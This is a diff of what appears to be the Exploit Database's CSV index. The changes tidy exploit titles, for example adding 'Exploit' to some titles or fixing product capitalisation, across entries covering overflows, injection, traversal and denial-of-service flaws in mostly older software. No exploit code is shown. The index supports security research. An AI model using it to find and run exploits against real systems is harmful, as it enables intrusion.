@@ -17741,7 +17744,7 @@ id,file,description,date,author,platform,type,port
 21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5 / Netscape Communicator 4 - IMG Tag Denial of Service",2001-06-19,"John Percival",multiple,dos,0
 20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent",2000-11-10,"Hugo Caye",windows,local,0
 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 - modprobe Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local,0
-20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File Denial of Service",2000-11-14,"403-security team",windows,dos,0
+20403,platforms/windows/dos/20403.txt,"Small HTTP Server 2.0 1 - Non-Existent File Denial of Service",2000-11-14,"403-security team",windows,dos,0
 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow",2000-11-14,Vort-fu,beos,remote,0
 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,cgi,remote,0
 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote,0
@@ -17759,7 +17762,7 @@ id,file,description,date,author,platform,type,port
 20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 CMS - Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0
 20421,platforms/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0
 20422,platforms/php/webapps/20422.txt,"MobileCartly 1.0 - Arbitrary File Write",2012-08-10,"Yakir Wizman",php,webapps,0
-20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script",1997-07-15,"Francisco Torres",cgi,remote,0
+20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0
 20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0
 20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - Index.dat",2000-11-23,"Georgi Guninski",windows,remote,0
 20427,platforms/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - '.asx' Buffer Overflow",2000-11-22,@stake,windows,remote,0
@@ -17783,7 +17786,7 @@ id,file,description,date,author,platform,type,port
 20445,platforms/windows/remote/20445.txt,"Microsoft IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1b - '.cmd' / '.CMD' Remote Command Execution",1996-03-01,anonymous,windows,remote,0
 20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0
 20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0
-20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote,0
+20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas Exploit",1996-07-03,"TTT Group",cgi,remote,0
 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0
 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0
 20451,platforms/windows/local/20451.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_displayparamstmt Buffer Overflow",2000-12-01,"David Litchfield",windows,local,0
@@ -17796,7 +17799,7 @@ id,file,description,date,author,platform,type,port
 20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak",2000-11-30,"Lamagra Argamal",linux,local,0
 20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit",2000-12-01,Key,windows,remote,0
 20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0
-20461,platforms/windows/remote/20461.txt,"Serv-U 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0
+20461,platforms/windows/remote/20461.txt,"Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0
 20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0
 20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote,0
 20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - (services.exe) Denial of Service",2012-08-12,loneferret,windows,dos,0
@@ -17815,7 +17818,7 @@ id,file,description,date,author,platform,type,port
 20478,platforms/windows/webapps/20478.txt,"IBM Websphere MQ File Transfer Edition Web Gateway - Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0
 20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,kingcope,linux,dos,0
 20481,platforms/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 - Appended Dot Script Source Disclosure",1997-02-20,"Mark Joseph Edwards",windows,remote,0
-20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl",1998-12-01,anonymous,novell,remote,0
+20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl Exploit",1998-12-01,anonymous,novell,remote,0
 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote,0
 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0
 20485,platforms/osx/local/20485.sh,"Viscosity OpenVPN Client (OSX) - Privilege Escalation",2012-08-13,zx2c4,osx,local,0
@@ -17938,7 +17941,7 @@ id,file,description,date,author,platform,type,port
 20605,platforms/windows/remote/20605.cpp,"Apple QuickTime plugin - Windows 4.1.2 (Japanese) Remote Overflow",2012-08-18,UNYUN,windows,remote,0
 20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow",2000-03-26,"Jin Ho You",cgi,remote,0
 20607,platforms/windows/remote/20607.txt,"goahead WebServer 2.0/2.1 - Directory Traversal",2001-02-02,"Sergey Nenashev",windows,remote,0
-20608,platforms/windows/remote/20608.txt,"guido frassetto sedum http server 2.0 - Directory Traversal",2001-02-04,"Joe Testa",windows,remote,0
+20608,platforms/windows/remote/20608.txt,"Guido Frassetto SEDUM HTTP Server 2.0 - Directory Traversal",2001-02-04,"Joe Testa",windows,remote,0
 20609,platforms/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 - Full Path Disclosure",2001-02-04,"Joe Testa",cgi,remote,0
 20610,platforms/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet - Denial of Service",2000-10-31,"Allaire Security",multiple,dos,0
 20611,platforms/cgi/remote/20611.txt,"anaconda Foundation 1.4 < 1.9 - Directory Traversal",2000-10-13,pestilence,cgi,remote,0
@@ -17984,7 +17987,7 @@ id,file,description,date,author,platform,type,port
 20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,hardware,dos,0
 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0
 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0
-20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal",2001-02-27,slipy,windows,remote,0
+20657,platforms/windows/remote/20657.txt,"Robin Twombly A1 HTTP Server 1.0 - Directory Traversal",2001-02-27,slipy,windows,remote,0
 20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 - '.joerc' Arbitrary Command Execution",2001-02-28,"Wkit Security",unix,local,0
 20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Malformed Request Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0
 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 - Arbitrary Command Execution",2001-02-14,"Marc Roessler",unix,remote,0
@@ -18120,7 +18123,7 @@ id,file,description,date,author,platform,type,port
 20802,platforms/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service",1997-06-21,"Andrea Arcangeli",windows,dos,0
 20803,platforms/windows/remote/20803.txt,"RaidenFTPd 2.1 - Directory Traversal",2001-04-25,joetesta,windows,remote,0
 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage",2001-04-26,V9,irix,local,0
-20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon",1998-10-21,Rootshell,irix,remote,0
+20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon Exploit",1998-10-21,Rootshell,irix,remote,0
 20806,platforms/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,hardware,remote,0
 20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal",2001-04-27,joetesta,multiple,remote,0
 20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal",2001-04-27,ThePike,cgi,remote,0
@@ -18141,7 +18144,7 @@ id,file,description,date,author,platform,type,port
 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local,0
 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0
 20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0
-20825,platforms/windows/remote/20825.txt,"michael lamont savant http server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0
+20825,platforms/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0
 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos,0
 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server - Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0
@@ -19352,8 +19355,8 @@ id,file,description,date,author,platform,type,port
 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0
 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0
 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
-22063,platforms/linux/remote/22063.c,"zeroo http server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote,0
-22064,platforms/linux/remote/22064.pl,"zeroo http server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote,0
+22063,platforms/linux/remote/22063.c,"Zeroo HTTP Server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote,0
+22064,platforms/linux/remote/22064.pl,"Zeroo HTTP Server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote,0
 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - search.php Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0
 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0
 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0
@@ -19685,7 +19688,7 @@ id,file,description,date,author,platform,type,port
 22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog - 'index.php Product_ID Parameter' SQL Injection",2012-11-01,D4NB4R,php,webapps,0
 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0
 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0
-22407,platforms/hardware/dos/22407.txt,"Netgear 1.x - ProSafe VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0
+22407,platforms/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0
 22408,platforms/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps,0
 22409,platforms/multiple/remote/22409.txt,"Simple Chat 1.x - User Information Disclosure",2003-03-21,subj,multiple,remote,0
 22410,platforms/multiple/remote/22410.pl,"ProtWare HTML Guardian 6.x - Encryption",2003-03-21,rain_song,multiple,remote,0
@@ -20496,7 +20499,7 @@ id,file,description,date,author,platform,type,port
 23231,platforms/multiple/dos/23231.txt,"Medieval Total War 1.0/1.1 - nickname Denial of Service",2003-10-07,"Luigi Auriemma",multiple,dos,0
 23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Inclusion",2003-10-08,"Zone-h Security Team",php,webapps,0
 23233,platforms/php/webapps/23233.txt,"GeekLog 1.3.x - HTML Injection",2003-10-08,Jelmer,php,webapps,0
-23234,platforms/windows/dos/23234.c,"Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial of Service",2003-10-08,I2S-LaB,windows,dos,0
+23234,platforms/windows/dos/23234.c,"Centrinity FirstClass HTTP Server 5.50/5.77/7.0/7.1 - Long Version Field Denial of Service",2003-10-08,I2S-LaB,windows,dos,0
 23235,platforms/windows/dos/23235.txt,"OpenOffice 1.0.1 - Remote Access Denial of Service",2003-10-08,"Marc Schoenefeld",windows,dos,0
 23236,platforms/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo - Display Environment Variable Buffer Overflow",2003-10-08,"Davide Del Vecchio",hp-ux,dos,0
 23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 - admin.php SQL Injection",2003-10-08,1dt.w0lf,php,webapps,0
@@ -20573,7 +20576,7 @@ id,file,description,date,author,platform,type,port
 23306,platforms/linux/remote/23306.c,"thttpd 2.2x - defang Remote Buffer Overflow (2)",2003-10-27,d3ck4,linux,remote,0
 23307,platforms/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting",2003-10-28,"Oliver Karow",multiple,remote,0
 23308,platforms/linux/local/23308.c,"kpopup 0.9.x - Privileged Command Execution",2003-10-28,b0f,linux,local,0
-23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass 7.1 - HTTP Server Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0
+23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0
 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos,0
 23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service",2003-10-29,Blademaster,php,dos,0
 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 - Input Validation",2003-10-30,"Corsaire Limited",cgi,remote,0
@@ -20865,7 +20868,7 @@ id,file,description,date,author,platform,type,port
 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0
 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
-23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - ISAPISkeleton.dll Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0
+23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0
 23613,platforms/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",cgi,webapps,0
 23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0
 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review - Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps,0
@@ -20906,7 +20909,7 @@ id,file,description,date,author,platform,type,port
 23651,platforms/php/remote/23651.rb,"WordPress Plugin WP-Property - Arbitrary .PHP File Upload (Metasploit)",2012-12-25,Metasploit,php,remote,0
 23652,platforms/php/remote/23652.rb,"WordPress Plugin Asset-Manager - Arbitrary .PHP File Upload (Metasploit)",2012-12-25,Metasploit,php,remote,0
 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
-23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0
+23654,platforms/windows/dos/23654.txt,"Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0
 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0
 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0
 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0
@@ -20942,7 +20945,7 @@ id,file,description,date,author,platform,type,port
 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
 23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
 23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 - Remote Resource Exhaustion",2004-02-16,"intuit e.b.",windows,remote,0
-23701,platforms/windows/dos/23701.txt,"XLight FTP Server 1.52 - Remote Send File Request Denial of Service",2004-02-16,"intuit e.b.",windows,dos,0
+23701,platforms/windows/dos/23701.txt,"Xlight FTP Server 1.52 - Remote Send File Request Denial of Service",2004-02-16,"intuit e.b.",windows,dos,0
 23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0
 23703,platforms/asp/webapps/23703.txt,"ProductCart 1.x/2.x - advSearch_h.asp Multiple Parameter SQL Injection",2004-02-16,"Nick Gudov",asp,webapps,0
 23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - Custva.asp redirectUrl Parameter Cross-Site Scripting",2004-02-16,"Nick Gudov",asp,webapps,0
@@ -20999,7 +21002,7 @@ id,file,description,date,author,platform,type,port
 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",multiple,dos,0
 23756,platforms/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote,0
 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",linux,dos,0
-23758,platforms/windows/remote/23758.txt,"gweb http server 0.5/0.6 - Directory Traversal",2004-02-24,"Donato Ferrante",windows,remote,0
+23758,platforms/windows/remote/23758.txt,"GWeb HTTP Server 0.5/0.6 - Directory Traversal",2004-02-24,"Donato Ferrante",windows,remote,0
 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - MFormat Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0
 23760,platforms/windows/dos/23760.pl,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,windows,dos,0
 23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,windows,dos,0
@@ -22599,7 +22602,7 @@ id,file,description,date,author,platform,type,port
 25415,platforms/ios/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
 25416,platforms/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,hardware,webapps,0
 25417,platforms/ios/webapps/25417.txt,"File Lite 3.3 / 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
-25418,platforms/windows/dos/25418.py,"MiniWeb MiniWeb HTTP Server (build 300) - Crash (PoC)",2013-05-13,dmnt,windows,dos,0
+25418,platforms/windows/dos/25418.py,"MiniWeb HTTP Server (build 300) - Crash (PoC)",2013-05-13,dmnt,windows,dos,0
 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0
 25420,platforms/multiple/remote/25420.txt,"IBM Websphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote,0
 25421,platforms/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Cross-Site Scripting",2005-04-15,"Oliver Karow",windows,remote,0
@@ -23500,7 +23503,7 @@ id,file,description,date,author,platform,type,port
 26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted Arbitrary File Upload",2013-06-19,"CWH Underground",php,webapps,0
 26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - wwv_flow.accept p_t02 Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0
 26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
-26318,platforms/hardware/remote/26318.py,"TP-Link Print Server TL PS110U - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0
+26318,platforms/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0
 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
 26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - f p Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0
@@ -23646,7 +23649,7 @@ id,file,description,date,author,platform,type,port
 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - showgallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0
 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0
 26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - news.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0
-26471,platforms/windows/remote/26471.py,"PCMan's FTP Server 2.0.7 - Buffer Overflow",2013-06-27,"Jacob Holcomb",windows,remote,21
+26471,platforms/windows/remote/26471.py,"PCMan FTP Server 2.0.7 - Buffer Overflow",2013-06-27,"Jacob Holcomb",windows,remote,21
 26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps,0
 26474,platforms/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0
 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0
@@ -23670,7 +23673,7 @@ id,file,description,date,author,platform,type,port
 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",linux,local,0
 26493,platforms/windows/remote/26493.py,"Bifrost 1.2.1 - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",windows,remote,0
 26494,platforms/windows/remote/26494.py,"Bifrost 1.2d - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",windows,remote,0
-26495,platforms/windows/remote/26495.py,"PCMan's FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,windows,remote,0
+26495,platforms/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,windows,remote,0
 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080
 26497,platforms/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,windows,remote,0
 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0
@@ -25606,7 +25609,7 @@ id,file,description,date,author,platform,type,port
 28501,platforms/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,multiple,remote,0
 28502,platforms/php/webapps/28502.txt,"TextAds - delete.php id Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0
 28503,platforms/php/webapps/28503.txt,"TextAds - error.php error Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0
-28504,platforms/php/local/28504.php,"PHP 3-5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0
+28504,platforms/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0
 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0
 29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 - QB_Path Parameter Multiple Remote File Inclusion",2006-12-27,Shell,php,webapps,0
 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0
@@ -25854,7 +25857,7 @@ id,file,description,date,author,platform,type,port
 28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - admin/tax_classes.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
 28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - admin/tax_rates.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
 28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - admin/zones.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
-28760,platforms/php/remote/28760.php,"PHP 3-5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0
+28760,platforms/php/remote/28760.php,"PHP 3 < 5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0
 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0
 28762,platforms/asp/webapps/28762.txt,"Civica - Display.asp SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0
 28763,platforms/windows/local/28763.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (1)",2006-08-26,"Ruben Santamarta ",windows,local,0
@@ -26197,7 +26200,7 @@ id,file,description,date,author,platform,type,port
 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
